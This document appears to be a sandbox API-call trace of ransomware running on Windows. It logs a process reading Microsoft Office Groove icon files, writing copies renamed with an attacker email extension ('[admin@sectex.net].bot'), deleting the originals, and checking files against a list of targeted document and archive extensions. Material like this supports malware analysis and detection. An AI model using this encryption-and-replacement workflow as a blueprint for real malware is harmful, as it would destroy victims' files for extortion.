	[0170.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0170.553] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.553] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0170.978] GetLastError () returned 0x0
	[0170.978] ReadFile (in: hFile=0x188, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0170.978] WriteFile (in: hFile=0x354, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0170.979] ReadFile (in: hFile=0x188, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.979] WriteFile (in: hFile=0x354, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0170.979] SetEndOfFile (hFile=0x354) returned 1
	[0170.980] CloseHandle (hObject=0x354) returned 1
	[0170.980] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.980] SetEndOfFile (hFile=0x188) returned 1
	[0170.982] CloseHandle (hObject=0x188) returned 1
	[0170.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.982] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico")) returned 1
	[0170.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.983] lstrlenW (lpString=".doc") returned 4
	[0170.983] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.983] lstrlenW (lpString=".docx") returned 5
	[0170.983] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0170.983] lstrlenW (lpString=".pdf") returned 4
	[0170.983] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.983] lstrlenW (lpString=".xls") returned 4
	[0170.984] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString=".xlsx") returned 5
	[0170.984] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0170.984] lstrlenW (lpString=".ppt") returned 4
	[0170.984] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString=".zip") returned 4
	[0170.984] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString=".rar") returned 4
	[0170.984] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString=".bz2") returned 4
	[0170.984] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.984] lstrlenW (lpString=".7z") returned 3
	[0170.984] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString=".dbf") returned 4
	[0170.984] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString=".1cd") returned 4
	[0170.984] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString=".jpg") returned 4
	[0170.984] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.984] lstrlenW (lpString=".doc") returned 4
	[0170.984] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.984] lstrlenW (lpString=".docx") returned 5
	[0170.984] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0170.984] lstrlenW (lpString=".pdf") returned 4
	[0170.984] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString=".xls") returned 4
	[0170.984] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.984] lstrlenW (lpString=".xlsx") returned 5
	[0170.985] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0170.985] lstrlenW (lpString=".ppt") returned 4
	[0170.985] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.985] lstrlenW (lpString=".zip") returned 4
	[0170.985] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.985] lstrlenW (lpString=".rar") returned 4
	[0170.985] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.985] lstrlenW (lpString=".bz2") returned 4
	[0170.985] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.985] lstrlenW (lpString=".7z") returned 3
	[0170.985] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.985] lstrlenW (lpString=".dbf") returned 4
	[0170.985] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.985] lstrlenW (lpString=".1cd") returned 4
	[0170.985] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO") returned 91
	[0170.985] lstrlenW (lpString=".jpg") returned 4
	[0170.985] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.985] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.985] lstrlenW (lpString="CHEVRON.ICO") returned 11
	[0170.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0170.995] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2862) returned 1
	[0170.995] CloseHandle (hObject=0x17c) returned 1
	[0170.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico")) returned 0x20
	[0171.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.009] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.009] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0171.010] GetLastError () returned 0x0
	[0171.010] ReadFile (in: hFile=0x17c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xb2e, lpOverlapped=0x0) returned 1
	[0171.012] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xb30, lpOverlapped=0x0) returned 1
	[0171.013] ReadFile (in: hFile=0x17c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.013] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0171.013] SetEndOfFile (hFile=0x3f0) returned 1
	[0171.013] CloseHandle (hObject=0x3f0) returned 1
	[0171.013] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.013] SetEndOfFile (hFile=0x17c) returned 1
	[0171.015] CloseHandle (hObject=0x17c) returned 1
	[0171.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.016] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\chevron.ico")) returned 1
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString=".doc") returned 4
	[0171.021] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.021] lstrlenW (lpString=".docx") returned 5
	[0171.021] lstrcmpiW (lpString1=".docx", lpString2="N.ICO") returned -1
	[0171.021] lstrlenW (lpString=".pdf") returned 4
	[0171.021] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.021] lstrlenW (lpString=".xls") returned 4
	[0171.021] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.021] lstrlenW (lpString=".xlsx") returned 5
	[0171.021] lstrcmpiW (lpString1=".xlsx", lpString2="N.ICO") returned -1
	[0171.021] lstrlenW (lpString=".ppt") returned 4
	[0171.021] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString=".zip") returned 4
	[0171.021] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.021] lstrlenW (lpString=".rar") returned 4
	[0171.021] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.021] lstrlenW (lpString=".bz2") returned 4
	[0171.021] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.021] lstrlenW (lpString=".7z") returned 3
	[0171.021] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString=".dbf") returned 4
	[0171.021] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString=".1cd") returned 4
	[0171.021] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.021] lstrlenW (lpString=".jpg") returned 4
	[0171.021] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString=".doc") returned 4
	[0171.022] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.022] lstrlenW (lpString=".docx") returned 5
	[0171.022] lstrcmpiW (lpString1=".docx", lpString2="N.ICO") returned -1
	[0171.022] lstrlenW (lpString=".pdf") returned 4
	[0171.022] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString=".xls") returned 4
	[0171.022] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString=".xlsx") returned 5
	[0171.022] lstrcmpiW (lpString1=".xlsx", lpString2="N.ICO") returned -1
	[0171.022] lstrlenW (lpString=".ppt") returned 4
	[0171.022] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString=".zip") returned 4
	[0171.022] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString=".rar") returned 4
	[0171.022] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.022] lstrlenW (lpString=".bz2") returned 4
	[0171.022] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.022] lstrlenW (lpString=".7z") returned 3
	[0171.022] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString=".dbf") returned 4
	[0171.022] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString=".1cd") returned 4
	[0171.022] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\CHEVRON.ICO") returned 71
	[0171.022] lstrlenW (lpString=".jpg") returned 4
	[0171.022] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.023] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.023] lstrlenW (lpString="ContactSelector.ico") returned 19
	[0171.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.023] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=3750) returned 1
	[0171.023] CloseHandle (hObject=0x388) returned 1
	[0171.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico")) returned 0x20
	[0171.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.024] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.024] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.037] GetLastError () returned 0x0
	[0171.037] ReadFile (in: hFile=0x388, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xea6, lpOverlapped=0x0) returned 1
	[0171.047] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xeb0, lpOverlapped=0x0) returned 1
	[0171.047] ReadFile (in: hFile=0x388, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.047] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0171.048] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.048] CloseHandle (hObject=0x3c4) returned 1
	[0171.048] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.048] SetEndOfFile (hFile=0x388) returned 1
	[0171.050] CloseHandle (hObject=0x388) returned 1
	[0171.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\contactselector.ico")) returned 1
	[0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.051] lstrlenW (lpString=".doc") returned 4
	[0171.051] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.051] lstrlenW (lpString=".docx") returned 5
	[0171.051] lstrcmpiW (lpString1=".docx", lpString2="r.ico") returned -1
	[0171.051] lstrlenW (lpString=".pdf") returned 4
	[0171.051] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.051] lstrlenW (lpString=".xls") returned 4
	[0171.051] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.051] lstrlenW (lpString=".xlsx") returned 5
	[0171.051] lstrcmpiW (lpString1=".xlsx", lpString2="r.ico") returned -1
	[0171.051] lstrlenW (lpString=".ppt") returned 4
	[0171.051] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.051] lstrlenW (lpString=".zip") returned 4
	[0171.051] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.051] lstrlenW (lpString=".rar") returned 4
	[0171.051] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.051] lstrlenW (lpString=".bz2") returned 4
	[0171.051] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.051] lstrlenW (lpString=".7z") returned 3
	[0171.051] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.051] lstrlenW (lpString=".dbf") returned 4
	[0171.051] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.051] lstrlenW (lpString=".1cd") returned 4
	[0171.052] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString=".jpg") returned 4
	[0171.052] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString=".doc") returned 4
	[0171.052] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.052] lstrlenW (lpString=".docx") returned 5
	[0171.052] lstrcmpiW (lpString1=".docx", lpString2="r.ico") returned -1
	[0171.052] lstrlenW (lpString=".pdf") returned 4
	[0171.052] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString=".xls") returned 4
	[0171.052] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString=".xlsx") returned 5
	[0171.052] lstrcmpiW (lpString1=".xlsx", lpString2="r.ico") returned -1
	[0171.052] lstrlenW (lpString=".ppt") returned 4
	[0171.052] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString=".zip") returned 4
	[0171.052] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString=".rar") returned 4
	[0171.052] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.052] lstrlenW (lpString=".bz2") returned 4
	[0171.052] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.052] lstrlenW (lpString=".7z") returned 3
	[0171.052] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString=".dbf") returned 4
	[0171.052] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.052] lstrlenW (lpString=".1cd") returned 4
	[0171.052] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ContactSelector.ico") returned 79
	[0171.053] lstrlenW (lpString=".jpg") returned 4
	[0171.053] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.053] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.053] lstrlenW (lpString="gfserrorfromgroove.ico") returned 22
	[0171.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrorfromgroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrorfromgroove.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.057] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1718) returned 1
	[0171.057] CloseHandle (hObject=0x17c) returned 1
